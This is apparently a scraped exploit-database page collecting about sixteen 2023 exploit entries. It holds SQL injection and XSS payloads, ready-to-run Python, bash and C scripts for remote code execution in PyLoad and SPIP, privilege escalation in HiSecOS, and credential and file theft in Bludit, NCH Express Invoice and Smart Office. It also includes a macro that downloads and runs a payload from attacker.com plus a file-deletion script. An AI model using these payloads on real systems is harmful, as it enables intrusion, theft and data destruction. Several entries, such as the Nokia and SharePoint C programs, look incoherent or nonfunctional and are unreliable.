ISHACK AI BOT

# Exploit Title: Jobpilot v2.61 - SQL Injection # Date: 2023-06-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822 # Demo Site: https://jobpilot.templatecookie.com # Tested on: Kali Linux # CVE: N/A ----- PoC: SQLi ----- Parameter: long (GET) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766) AND EXTRACTVALUE(4894,CONCAT(0x5c,0x7170766271,(SELECT (ELT(4894=4894,1))),0x71786b7171)) AND (1440=1440&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL Fire Contract Counties, California, United States&category=&price_min=&price_max=&tag= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766) AND (SELECT 9988 FROM (SELECT(SLEEP(5)))bgbf) AND (1913=1913&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL Fire Contract Counties, California, United States&category=&price_min=&price_max=&tag=

# Exploit Title: Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS) # Date of found: 12/05/2023 # Exploit Author: VIVEK CHOUDHARY @sudovivek # Version: V1.0 # Tested on: Windows 10 # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/ # CVE: CVE-2023-33580 # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33580 Vulnerability Description - The Student Study Center Management System V1.0, developed by PHPGurukul, is susceptible to a critical security vulnerability known as Stored Cross-Site Scripting (XSS). This vulnerability enables attackers to inject malicious JavaScript code, which is then stored and executed by the application. The underlying issue lies in the system's failure to adequately sanitize and validate user-provided input within the "Admin Name" field on the Admin Profile page, thereby allowing attackers to inject arbitrary JavaScript code. Steps to Reproduce - The following steps demonstrate how to exploit the Stored XSS vulnerability in the Student Study Center Management System V1.0: 1. Visit the Student Study Center Management System V1.0 application by accessing the URL: http://localhost/student-study-center-MS-PHP/sscms/index.php. 2. Click on the "Admin" button to navigate to the admin login page. 3. Login to the Admin account using the default credentials. - Username: admin - Password: Test@123 4. Proceed to the Admin Profile page. 5. Within the "Admin Name" field, inject the following XSS payload, enclosed in brackets: {"><script>alert("XSS")</script>}. 6. Click on the "Submit" button. 7. Refresh the page, and the injected payload will be executed. As a result of successful exploitation, the injected JavaScript code will be stored in the application's database. Subsequently, whenever another user accesses the affected page, the injected code will execute, triggering an alert displaying the text "XSS." This allows the attacker to execute arbitrary code within the user's browser, potentially leading to further attacks or unauthorized actions.

# Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS) # Exploit Author: tmrswrr / Hulya Karabag # Vendor Homepage: https://www.diafancms.com/ # Version: 6.0 # Tested on: https://demo.diafancms.com Description: 1) https://demo.diafancms.com/ Go to main page and write your payload in Search in the goods > Article field: Payload : "><script>alert(document.domain)<%2Fscript> 2) After will you see alert button : https://demo.diafancms.com/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pr1=0&pr2=0

Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS) Google Dork: N/A Date: 18-06-2023 Exploit Author: Harshit Joshi Vendor Homepage: https://community.broadcom.com/home Software Link: https://www.broadcom.com/products/identity/siteminder Version: 12.52 Tested on: Linux, Windows CVE: CVE-2023-23956 Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221 *Description:* I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I have discovered in the Symantec SiteMinder WebAgent. The vulnerability is related to the improper handling of user input and has been assigned the Common Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for this vulnerability is 5.4. Vulnerability Details: --------------------- *Impact:* This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the affected application. *Steps to Reproduce:* *First:* 1) Visit - https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22 2) After visiting the above URL, click on the "*Change Password*" button, and the popup will appear. - The *SMAGENTNAME *parameter is the source of this vulnerability. *- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="* *Second:* 1) Visit - https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22 2) After visiting the above URL, click on the "*Change Password*" button, and the popup will appear. - The *TARGET *parameter is the source of this vulnerability. *- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*

# Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password # Dork: inurl:/wp-includes/class-wp-query.php # Date: 2023-06-19 # Exploit Author: Amirhossein Bahramizadeh # Category : Webapps # Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html # Version: 1.0.0 (REQUIRED) # Tested on: Windows/Linux # CVE: CVE-2020-11027 import requests from bs4 import BeautifulSoup from datetime import datetime, timedelta # Set the WordPress site URL and the user email address site_url = 'https://example.com' user_email = '[email protected]' # Get the password reset link from the user email # You can use any email client or library to retrieve the email # In this example, we are assuming that the email is stored in a file named 'password_reset_email.html' with open('password_reset_email.html', 'r') as f: email = f.read() soup = BeautifulSoup(email, 'html.parser') reset_link = soup.find('a', href=True)['href'] print(f'Reset Link: {reset_link}') # Check if the password reset link expires upon changing the user password response = requests.get(reset_link) if response.status_code == 200: # Get the expiration date from the reset link HTML soup = BeautifulSoup(response.text, 'html.parser') expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1] expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p') print(f'Expiration Date: {expiration_date}') # Check if the expiration date is less than 24 hours from now if expiration_date < datetime.now() + timedelta(hours=24): print('Password reset link expires upon changing the user password.') else: print('Password reset link does not expire upon changing the user password.') else: print(f'Error fetching reset link: {response.status_code} {response.text}') exit()

# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE) # Date: 06-10-2023 # Credits: bAu @bauh0lz # Exploit Author: Gabriel Lima (0xGabe) # Vendor Homepage: https://pyload.net/ # Software Link: https://github.com/pyload/pyload # Version: 0.5.0 # Tested on: Ubuntu 20.04.6 # CVE: CVE-2023-0297 import requests, argparse parser = argparse.ArgumentParser() parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.') parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.') arguments = parser.parse_args() def doRequest(url): try: res = requests.get(url + '/flash/addcrypted2') if res.status_code == 200: return True else: return False except requests.exceptions.RequestException as e: print("[!] Maybe the host is offline :", e) exit() def runExploit(url, cmd): endpoint = url + '/flash/addcrypted2' if " " in cmd: validCommand = cmd.replace(" ", "%20") else: validCommand = cmd payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload) print('[+] The exploit has be executeded in target machine. ') def main(targetUrl, Command): print('[+] Check if target host is alive: ' + targetUrl) alive = doRequest(targetUrl) if alive == True: print("[+] Host up, let's exploit! ") runExploit(targetUrl,Command) else: print('[-] Host down! ') if(arguments.url != None and arguments.cmd != None): targetUrl = arguments.url Command = arguments.cmd main(targetUrl, Command)

# Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS) # Dork: inurl:~/admin/views/admin.php # Date: 2023-06-20 # Exploit Author: Amirhossein Bahramizadeh # Category : Webapps # Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social # Version: 1.0.1 (REQUIRED) # Tested on: Windows/Linux # CVE : CVE-2023-3320 import requests import hashlib import time # Set the target URL url = "http://example.com/wp-admin/admin.php?page=wpss_settings" # Set the user agent string user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" # Generate the nonce value nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest() # Set the data payload payload = { "wpss_nonce": nonce, "wpss_setting_1": "value_1", "wpss_setting_2": "value_2", # Add additional settings as needed } # Set the request headers headers = { "User-Agent": user_agent, "Referer": url, "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983", # Add additional headers as needed } # Send the POST request response = requests.post(url, data=payload, headers=headers) # Check the response status code if response.status_code == 200: print("Request successful") else: print("Request failed")

# Exploit Title: Super Socializer 7.13.52 - Reflected XSS # Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com # Date: 2023-06-20 # Exploit Author: Amirhossein Bahramizadeh # Category : Webapps # Vendor Homepage: https://wordpress.org/plugins/super-socializer # Version: 7.13.52 (REQUIRED) # Tested on: Windows/Linux # CVE : CVE-2023-2779 import requests # The URL of the vulnerable AJAX endpoint url = "https://example.com/wp-admin/admin-ajax.php" # The vulnerable parameter that is not properly sanitized and escaped vulnerable_param = "<img src=x onerror=alert(document.domain)>" # The payload that exploits the vulnerability payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"} # Send a POST request to the vulnerable endpoint with the payload response = requests.post(url, data=payload) # Check if the payload was executed by searching for the injected script tag if "<img src=x onerror=alert(document.domain)>" in response.text: print("Vulnerability successfully exploited") else: print("Vulnerability not exploitable")

// Exploit Title: Nokia ASIKA 7.13.52 - Hard-coded private key disclosure // Date: 2023-06-20 // Exploit Author: Amirhossein Bahramizadeh // Category : Hardware // Vendor Homepage: https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2023-25187/ // Version: 7.13.52 (REQUIRED) // Tested on: Windows/Linux // CVE : CVE-2023-25187 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <unistd.h> #include <netinet/in.h> #include <arpa/inet.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/wait.h> #include <signal.h> // The IP address of the vulnerable device char *host = "192.168.1.1"; // The default SSH port number int port = 22; // The username and password for the BTS service user account char *username = "service_user"; char *password = "password123"; // The IP address of the attacker's machine char *attacker_ip = "10.0.0.1"; // The port number to use for the MITM attack int attacker_port = 2222; // The maximum length of a message #define MAX_LEN 1024 // Forward data between two sockets void forward_data(int sock1, int sock2) { char buffer[MAX_LEN]; ssize_t bytes_read; while ((bytes_read = read(sock1, buffer, MAX_LEN)) > 0) { write(sock2, buffer, bytes_read); } } int main() { int sock, pid1, pid2; struct sockaddr_in addr; char *argv[] = {"/usr/bin/ssh", "-l", username, "-p", "2222", "-o", "StrictHostKeyChecking=no", "-o", "UserKnownHostsFile=/dev/null", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-i", "/path/to/private/key", "-N", "-R", "2222:localhost:22", host, NULL}; // Create a new socket sock = socket(AF_INET, SOCK_STREAM, 0); // Set the address to connect to memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(port); inet_pton(AF_INET, host, &addr.sin_addr); // Connect to the vulnerable device if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) { fprintf(stderr, "Error connecting to %s:%d: %s\n", host, port, strerror(errno)); exit(1); } // Send the SSH handshake write(sock, "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10\r\n", 42); read(sock, NULL, 0); // Send the username write(sock, username, strlen(username)); write(sock, "\r\n", 2); read(sock, NULL, 0); // Send the password write(sock, password, strlen(password)); write(sock, "\r\n", 2); // Wait for the authentication to complete sleep(1); // Start an SSH client on the attacker's machine pid1 = fork(); if (pid1 == 0) { execv("/usr/bin/ssh", argv); exit(0); } // Start an SSH server on the attacker's machine pid2 = fork(); if (pid2 == 0) { execl("/usr/sbin/sshd", "/usr/sbin/sshd", "-p", "2222", "-o", "StrictModes=no", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-o", "AuthorizedKeysFile=/dev/null", "-o", "HostKey=/path/to/private/key", NULL); exit(0); } // Wait for the SSH server to start sleep(1); // Forward data between the client and the server pid1 = fork(); if (pid1 == 0) { forward_data(sock, STDIN_FILENO); exit(0); } pid2 = fork(); if (pid2 == 0) { forward_data(STDOUT_FILENO, sock); exit(0); } // Wait for the child processes to finish waitpid(pid1, NULL, 0); waitpid(pid2, NULL, 0); // Close the socket close(sock); return 0; }

#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Exploit Title: SPIP v4.2.1 - Remote Code Execution (Unauthenticated) # Google Dork: inurl:"/spip.php?page=login" # Date: 19/06/2023 # Exploit Author: nuts7 (https://github.com/nuts7/CVE-2023-27372) # Vendor Homepage: https://www.spip.net/ # Software Link: https://files.spip.net/spip/archives/ # Version: < 4.2.1 (Except few fixed versions indicated in the description) # Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0 # CVE reference : CVE-2023-27372 (coiffeur) # CVSS : 9.8 (Critical) # # Vulnerability Description: # # SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1. # This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges. # # Usage: python3 CVE-2023-27372.py http://example.com import argparse import bs4 import html import requests def parseArgs(): parser = argparse.ArgumentParser(description="Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7") parser.add_argument("-u", "--url", default=None, required=True, help="SPIP application base URL") parser.add_argument("-c", "--command", default=None, required=True, help="Command to execute") parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)") return parser.parse_args() def get_anticsrf(url): r = requests.get('%s/spip.php?page=spip_pass' % url, timeout=10) soup = bs4.BeautifulSoup(r.text, 'html.parser') csrf_input = soup.find('input', {'name': 'formulaire_action_args'}) if csrf_input: csrf_value = csrf_input['value'] if options.verbose: print("[+] Anti-CSRF token found : %s" % csrf_value) return csrf_value else: print("[-] Unable to find Anti-CSRF token") return -1 def send_payload(url, payload): data = { "page": "spip_pass", "formulaire_action": "oubli", "formulaire_action_args": csrf, "oubli": payload } r = requests.post('%s/spip.php?page=spip_pass' % url, data=data) if options.verbose: print("[+] Execute this payload : %s" % payload) return 0 if __name__ == '__main__': options = parseArgs() requests.packages.urllib3.disable_warnings() requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' try: requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' except AttributeError: pass csrf = get_anticsrf(url=options.url) send_payload(url=options.url, payload="s:%s:\"<?php system('%s'); ?>\";" % (20 + len(options.command), options.command))

# Exploit Title: HiSecOS 04.0.01 - Privilege Escalation # Google Dork: HiSecOS Web Server Vulnerability Allows User Role Privilege Escalation # Date: 21.06.2023 # Exploit Author: dreizehnutters # Vendor Homepage: https://dam.belden.com/dmm3bwsv3/assetstream.aspx?assetid=15437&mediaformatid=50063&destinationid=10016 # Version: HiSecOS-04.0.01 or lower # Tested on: HiSecOS-04.0.01 # CVE: BSECV-2021-07 #!/bin/bash if [[ $# -lt 3 ]]; then echo "Usage: $0 <IP> <USERNAME> <PASSWORD>" exit 1 fi target="$1" user="$2" pass="$3" # Craft basic header auth=$(echo -ne "$user:$pass" | base64) # Convert to ASCII hex blob=$(printf "$user" | xxd -ps -c 1) # Generate XML payload ('15' -> admin role) gen_payload() { cat <<EOF <rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:x-mops:1.0 ../mops.xsd" message-id="20"> <mibOperation xmlns="urn:x-mops:1.0"> <edit-config> <MIBData> <MIB name="HM2-USERMGMT-MIB"> <Node name="hm2UserConfigEntry"> <Index> <Attribute name="hm2UserName">$blob</Attribute> </Index> <Set name="hm2UserAccessRole">15</Set> </Node> </MIB> </MIBData> </edit-config> </mibOperation> </rpc> EOF } curl -i -s -k -X POST \ -H "content-type: application/xml" \ -H "authorization: Basic ${auth}" \ --data-binary "$(gen_payload)" \ "https://${target}/mops_data" echo "[*] $user is now an admin"

## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing ## Author: nu11secur1ty ## Date: 06.22.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app ## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected ## Description: Microsoft OneNote is vulnerable to spoofing attacks. The malicious user can trick the victim into clicking on a very maliciously crafted URL or download some other malicious file and execute it. When this happens the game will be over for the victim and his computer will be compromised. Exploiting the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft OneNote and then click on a specially crafted URL to be compromised by the attacker. STATUS: HIGH Vulnerability [+]Exploit: ```vbs Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass", vbNormalFocus) End Sub ``` [+]Inside-exploit ``` @echo off del /s /q C:%HOMEPATH%\IMPORTANT\* ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html) ## Time spend: 01:15:00 --

# Exploit Title: NCH Express Invoice - Clear Text Password Storage and Account Takeover # Google Dork:: intitle:ExpressInvoice - Login # Date: 07/Apr/2020 # Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/) # Vendor Homepage: https://www.nchsoftware.com/ # Software Link: http://www.oldversiondownload.com/oldversions/express-8-05-2020-06-08.exe # Version: NCH Express Invoice 8.24 and before # CVE Number : CVE-2020-11560 # CVSS: 7.8 (High) # Reference: https://cvewalkthrough.com/cve-2020-11560/ # Vulnerability Description: # Express Invoice is a thick client application that has functionality to allow the application access over the web. While configuring web access function application ask for user details such as username, password, email, etc. Application stores this information in “C:\ProgramData\NCH Software\ExpressInvoice\Accounts” in clear text as well as due to inadequate folder pemtion any Low prevladge authenticated user can access files stored in cleartext format #Note: from version 8.24 path changed to “C:\ProgramData\NCH Software\ExpressInvoice\WebAccounts” import os import urllib.parse # Enable ANSI escape sequences for colors on Windows if os.name == 'nt': os.system('') # Function to decode URL encoding def decode_url(url): decoded_url = urllib.parse.unquote(url) return decoded_url # Function to list files and display as numeric list def list_files(file_list): for i, file in enumerate(file_list, start=1): # Omit the part of the file name after %40 username = file.split("%40")[0] print(f"{i}. {username}") # Main program print("\033[93mDisclaimer: This script is for educational purposes only.") print("The author takes no responsibility for any unauthorized usage.") print("Please use this script responsibly and adhere to the legal and ethical guidelines.\033[0m") agreement = input("\033[93mDo you agree to the terms? (yes=1, no=0): \033[0m") if agreement != '1': print("\033[93mYou did not agree to the terms. Exiting the program.\033[0m") exit() nch_version = input("\033[93mIs the targeted NCH Express Invoice application version less than 8.24? (yes=1, no=0): \033[0m") if nch_version == '1': file_directory = r"C:\ProgramData\NCH Software\ExpressInvoice\WebAccounts" else: file_directory = r"C:\ProgramData\NCH Software\ExpressInvoice\Accounts" file_list = os.listdir(file_directory) print("\033[94mUser Accounts:\033[0m") list_files(file_list) selected_file = input("\033[94mSelect the file number for the user: \033[0m") selected_file = int(selected_file) - 1 file_path = os.path.join(file_directory, file_list[selected_file]) with open(file_path, 'r') as file: contents = file.read() print(f"\033[94mSelected User: {file_list[selected_file].split('%40')[0]}\033[0m") exploit_option = input("\n\033[94mSelect the exploit option: " "\n1. Display User Passwords " "\n2. Account Takeover Using Password Replace " "\n3. User Privilege Escalation\nOption: \033[0m") # Exploit actions if exploit_option == "1": decoded_contents = decode_url(contents) print("\033[91mPlease find the password in the below string:\033[0m") print(decoded_contents) elif exploit_option == "2": new_password = input("\033[92mEnter the new password: \033[0m") current_password = contents.split("Password=")[1].split("&")[0] replaced_contents = contents.replace(f"Password={current_password}", f"Password={new_password}") print("\033[92mSelected user's password changed to: Your password\033[0m") print(replaced_contents) with open(file_path, 'w') as file: file.write(replaced_contents) elif exploit_option == "3": replaced_contents = contents.replace("Administrator=0", "Administrator=1").replace("Priviligies=2", "Priviligies=1") print("\033[92mUser is now an Administrator.\033[0m") print(replaced_contents) with open(file_path, 'w') as file: file.write(replaced_contents) else: print("\033[91mInvalid exploit option. Exiting the program.\033[0m") exit() print("\033[91mFor more such interesting exploits, visit cvewalkthrough.com\033[0m") input("\033[91mPress enter to exit.\033[0m")

# Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated) # Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office" # Date: 09/Dec/2022 # Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/) # Vendor Homepage: https://smartofficepayroll.com/ # Software Link: https://smartofficepayroll.com/downloads # Version: Smart Office Web 20.28 and before # CVE Number : CVE-2022-47075 and CVE-2022-47076 # CVSS : 7.5 (High) # Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/ # Vulnerability Description: # Smart Office Web 20.28 and before allows Remote Information Disclosure(Unauthenticated) via insecure direct object reference (IDOR). This was fixed in latter version except for ExportEmployeeDetails. import wget import os from colorama import Fore, Style def download_file(url, filename): wget.download(url, filename) # Disclaimer print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.") print("The author takes no responsibility for any unauthorized usage.") print("Please use this script responsibly and adhere to the legal and ethical guidelines.") agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ") if agree != "1": print("You have chosen not to agree. Exiting the script.") exit() # Print name in red name = "Exploit by Tejas Nitin Pingulkar" print(Fore.RED + name) print(Style.RESET_ALL) # Reset color website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ") target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ") folder_name = input("Enter the folder name to save the files: ") # Create the folder if it doesn't exist if not os.path.exists(folder_name): os.makedirs(folder_name) urls_filenames = [] if target_version == "1": urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv")) else: urls_filenames.extend([ (website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"), (website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"), (website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"), (website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv") ]) print("CVE-2022-47076: Obtain user ID and password from downloaded source") for url, filename in urls_filenames: download_file(url, os.path.join(folder_name, filename)) # Print "for more such interesting exploits, visit cvewalkthrough.com" in red print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com") print(Style.RESET_ALL) # Reset color

# -*- coding: utf-8 -*- #/usr/bin/env python # Exploit Title: Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated) # Date: 2022-07-21 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https://www.bludit.com # Software Link: https://github.com/bludit/bludit # Version: < 3.13.1 # Tested on: Debian 10 - PHP Version: 7.3.14 import requests import argparse from bs4 import BeautifulSoup #pip3 install beautifulsoup4 def main(): parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)') parser.add_argument('-x', '--url', type=str, required=True) parser.add_argument('-u', '--user', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) parser.add_argument('-f', '--file', type=str, required=True) args = parser.parse_args() print("\nBludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n") exploit(args) def exploit(args): s2 = requests.Session() url = args.url.rstrip("/") #get csrf token r = s2.get(url+'/admin/') soup = BeautifulSoup(r.text, 'html.parser') formtoken = soup.find('input', {'name':'tokenCSRF'})['value'] #login body= {'tokenCSRF':formtoken,'username':args.user,'password':args.password} r = s2.post(url+'/admin/', data=body, allow_redirects=False) if(r.status_code==301 and r.headers['location'].find('/admin/dashboard') != -1): print("[*] Login OK") else: print("[*] Login Failed") exit(1) #arbitrary download r = s2.get(url+'/plugin-backup-download?file=../../../../../../../../'+args.file) if(r.status_code==200 and len(r.content)>0): print("[*] File:") print(r.text) else: print("[*] Exploit Failed") exit(1) if __name__ == '__main__': main()

# Exploit Title: MCL-Net 4.3.5.8788 - Information Disclosure # Date: 5/31/2023 # Exploit Author: Victor A. Morales, GM Sectec Inc. # Vendor Homepage: https://www.mcl-mobilityplatform.com/net.php # Version: 4.3.5.8788 (other versions may be affected) # Tested on: Microsoft Windows 10 Pro # CVE: CVE-2023-34834 Description: Directory browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the "/file" endpoint. Steps to reproduce: 1. Navigate to the webserver on default port 5080, where "Index of Services" will disclose directories, including the "/file" directory. 2. Browse to the "/file" directory and database entry folders configured 3. The "AdoInfo.txt" file will contain the database connection strings in plaintext for the configured database. Other files containing database information are also available inside the directory.

// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing // Date: 2023-06-20 // country: Iran // Exploit Author: Amirhossein Bahramizadeh // Category : Remote // Vendor Homepage: // Microsoft SharePoint Foundation 2013 Service Pack 1 // Microsoft SharePoint Server Subscription Edition // Microsoft SharePoint Enterprise Server 2013 Service Pack 1 // Microsoft SharePoint Server 2019 // Microsoft SharePoint Enterprise Server 2016 // Tested on: Windows/Linux // CVE : CVE-2023-28288 #include <windows.h> #include <stdio.h> // The vulnerable SharePoint server URL const char *server_url = "http://example.com/"; // The URL of the fake SharePoint server const char *fake_url = "http://attacker.com/"; // The vulnerable SharePoint server file name const char *file_name = "vuln_file.aspx"; // The fake SharePoint server file name const char *fake_file_name = "fake_file.aspx"; int main() { HANDLE file; DWORD bytes_written; char file_contents[1024]; // Create the fake file contents sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>"); // Write the fake file to disk file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (file == INVALID_HANDLE_VALUE) { printf("Error creating fake file: %d\n", GetLastError()); return 1; } if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL)) { printf("Error writing fake file: %d\n", GetLastError()); CloseHandle(file); return 1; } CloseHandle(file); // Send a request to the vulnerable SharePoint server to download the file sprintf(file_contents, "%s%s", server_url, file_name); file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (file == INVALID_HANDLE_VALUE) { printf("Error creating vulnerable file: %d\n", GetLastError()); return 1; } if (!InternetReadFileUrl(file_contents, file)) { printf("Error downloading vulnerable file: %d\n", GetLastError()); CloseHandle(file); return 1; } CloseHandle(file); // Replace the vulnerable file with the fake file if (!DeleteFile(file_name)) { printf("Error deleting vulnerable file: %d\n", GetLastError()); return 1; } if (!MoveFile(fake_file_name, file_name)) { printf("Error replacing vulnerable file: %d\n", GetLastError()); return 1; } // Send a request to the vulnerable SharePoint server to trigger the vulnerability sprintf(file_contents, "%s%s", server_url, file_name); if (!InternetReadFileUrl(file_contents, NULL)) { printf("Error triggering vulnerability: %d\n", GetLastError()); return 1; } // Print a message indicating that the vulnerability has been exploited printf("Vulnerability exploited successfully.\n"); return 0; } BOOL InternetReadFileUrl(const char *url, HANDLE file) { HINTERNET internet, connection, request; DWORD bytes_read; char buffer[1024]; // Open an Internet connection internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); if (internet == NULL) { return FALSE; } // Connect to the server connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0); if (connection == NULL) { InternetCloseHandle(internet); return FALSE; } // Send the HTTP request request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0); if (request == NULL) { InternetCloseHandle(connection); InternetCloseHandle(internet); return FALSE; } if (!HttpSendRequest(request, NULL, 0, NULL, 0)) { InternetCloseHandle(request); InternetCloseHandle(connection); InternetCloseHandle(internet); return FALSE; } // Read the response data while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0) { if (file != NULL) { // Write the data to disk if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL)) { InternetCloseHandle(request); InternetCloseHandle(connection); InternetCloseHandle(internet); return FALSE; } } } InternetCloseHandle(request); InternetCloseHandle(connection); InternetCloseHandle(internet); return TRUE; }

